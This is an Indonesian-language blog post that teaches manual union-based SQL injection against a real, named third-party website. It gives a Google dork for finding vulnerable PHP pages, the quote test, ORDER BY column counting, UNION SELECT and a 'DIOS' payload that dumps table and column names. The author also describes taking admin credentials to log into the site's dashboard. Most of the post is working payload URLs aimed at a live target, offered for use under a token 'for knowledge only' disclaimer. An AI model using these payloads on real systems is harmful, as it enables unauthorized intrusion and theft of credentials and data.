Sql Injection Manual

Minggu, 29 Maret 2020 Tambah Komentar Edit


Hallo Xploiter welcome back with me,so disini saya akan menjelaskan bagaimana sihh cara nya melakukan sql injection itu?




 SQL Injection sendiri merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Oke kita mulai sob,pertama yang lu butuhin adalah dork!.Nihh gua kasih yang presh. Dork:inurl:".php?id=" site:in

 Pertama lu dorking dulu di google



Dahh dorking?lu pilih target lu.Gua dahh dapet nihh 

Target:http://musculoskeletalsociety.in/page.php?id=5

Terus lu cek target nya dengan nambahin query dibelakang url jadi gini.

Target:http://musculoskeletalsociety.in/page.php?id=5'

Kalau vuln dia bakal munculin error syntax nya selerti gambar dibawah.


Gambar diatas adalah contoh web yang rentan terhadap sql injection.Jika sudah seperti itu kita lanjut ke tahap selanjutnya dengan menentukan jumlah table yang ada di website tersebut dengan cara melakukan order by.Contoh:

http://musculoskeletalsociety.in/page.php?id=5+order+by+1--+
http://musculoskeletalsociety.in/page.php?id=5+order+by+2--+
http://musculoskeletalsociety.in/page.php?id=5+order+by+3--+

Nah disini lu cari terus sampai muncul error lagi dan disini gua error nya sampai di 6 berarti table nya ada 5.Jika sudah lu lanjut ke tahap selanjutnya yaitu union select.Contoh:

http://musculoskeletalsociety.in/page.php?id=5+union+select+1,2,3,4,5--+
Nanti dia akan muncul angka ajaib seperti gambar dibawah ini.

Note:Jika angka ajaib tidak mau muncul silahkan tambahkan query and false dibelakang id contoh:
http://musculoskeletalsociety.in/page.php?id=5 and false+union+select+1,2,3,4,5--+

Nahh disana angka ajaib nya dua jadi kita akan meletakan diosnya di angka dua contoh:
http://musculoskeletalsociety.in/page.php?id=5 and false+union+select+1,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),3,4,5--+


Dan boom database sudah di depan mata setelah muncul database nya terserah apa yang mau kalian dump,kalau saya sihh ambil user pass admin masuk dashboard admin pepes :v hehe tapi jangan ini hanya untuk pengetahuan yahh :)

Oke mungkin cukup sekian dari saya

Warm Regards From ./LuLlaby007

Belum ada Komentar untuk "Sql Injection Manual"

Posting Komentar

Langganan: Posting Komentar (Atom)

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel